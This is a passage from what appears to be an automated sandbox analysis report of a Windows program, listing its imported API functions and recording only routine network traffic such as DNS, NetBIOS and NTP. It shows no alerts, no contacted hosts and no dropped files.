0x493640 GetKeyState
0x493644 GetKeyNameTextA
0x493648 GetIconInfo
0x49364c GetForegroundWindow
0x493650 GetFocus
0x493654 GetDlgItem
0x493658 GetDesktopWindow
0x49365c GetDCEx
0x493660 GetDC
0x493664 GetCursorPos
0x493668 GetCursor
0x49366c GetClipboardData
0x493670 GetClientRect
0x493674 GetClassNameA
0x493678 GetClassInfoA
0x49367c GetCapture
0x493680 GetActiveWindow
0x493684 FrameRect
0x493688 FindWindowA
0x49368c FillRect
0x493690 EqualRect
0x493694 EnumWindows
0x493698 EnumThreadWindows
0x49369c EndPaint
0x4936a0 EnableWindow
0x4936a4 EnableScrollBar
0x4936a8 EnableMenuItem
0x4936ac DrawTextA
0x4936b0 DrawMenuBar
0x4936b4 DrawIconEx
0x4936b8 DrawIcon
0x4936bc DrawFrameControl
0x4936c0 DrawFocusRect
0x4936c4 DrawEdge
0x4936c8 DispatchMessageA
0x4936cc DestroyWindow
0x4936d0 DestroyMenu
0x4936d4 DestroyIcon
0x4936d8 DestroyCursor
0x4936dc DeleteMenu
0x4936e0 DefWindowProcA
0x4936e4 DefMDIChildProcA
0x4936e8 DefFrameProcA
0x4936ec CreatePopupMenu
0x4936f0 CreateMenu
0x4936f4 CreateIcon
0x4936f8 ClientToScreen
0x4936fc CheckMenuItem
0x493700 CallWindowProcA
0x493704 CallNextHookEx
0x493708 BeginPaint
0x49370c CharNextA
0x493710 CharLowerBuffA
0x493714 CharLowerA
0x493718 CharUpperBuffA
0x49371c CharToOemA
0x493720 AdjustWindowRectEx
Library kernel32.dll:
0x49372c Sleep
Library oleaut32.dll:
0x493734 SafeArrayPtrOfIndex
0x493738 SafeArrayPutElement
0x49373c SafeArrayGetElement
0x493744 SafeArrayAccessData
0x493748 SafeArrayGetUBound
0x49374c SafeArrayGetLBound
0x493750 SafeArrayCreate
0x493754 VariantChangeType
0x493758 VariantCopyInd
0x49375c VariantCopy
0x493760 VariantClear
0x493764 VariantInit
Library ole32.dll:
0x493770 IsAccelerator
0x493774 OleDraw
0x49377c CoTaskMemFree
0x493780 ProgIDFromCLSID
0x493784 StringFromCLSID
0x493788 CoCreateInstance
0x49378c CoGetClassObject
0x493790 CoUninitialize
0x493794 CoInitialize
0x493798 IsEqualGUID
Library oleaut32.dll:
0x4937a0 GetErrorInfo
0x4937a4 GetActiveObject
0x4937a8 SysFreeString
Library comctl32.dll:
0x4937b8 ImageList_Write
0x4937bc ImageList_Read
0x4937cc ImageList_DragMove
0x4937d0 ImageList_DragLeave
0x4937d4 ImageList_DragEnter
0x4937d8 ImageList_EndDrag
0x4937dc ImageList_BeginDrag
0x4937e0 ImageList_Remove
0x4937e4 ImageList_DrawEx
0x4937e8 ImageList_Replace
0x4937ec ImageList_Draw
0x4937fc ImageList_Add
0x493804 ImageList_Destroy
0x493808 ImageList_Create
0x49380c InitCommonControls
Library comdlg32.dll:
0x493814 GetOpenFileNameA

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51808 114.114.114.114 53
192.168.56.101 53657 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 60123 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355
192.168.56.101 65004 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 53658 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702
192.168.56.101 60124 239.255.255.250 3702
192.168.56.101 62194 239.255.255.250 1900

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.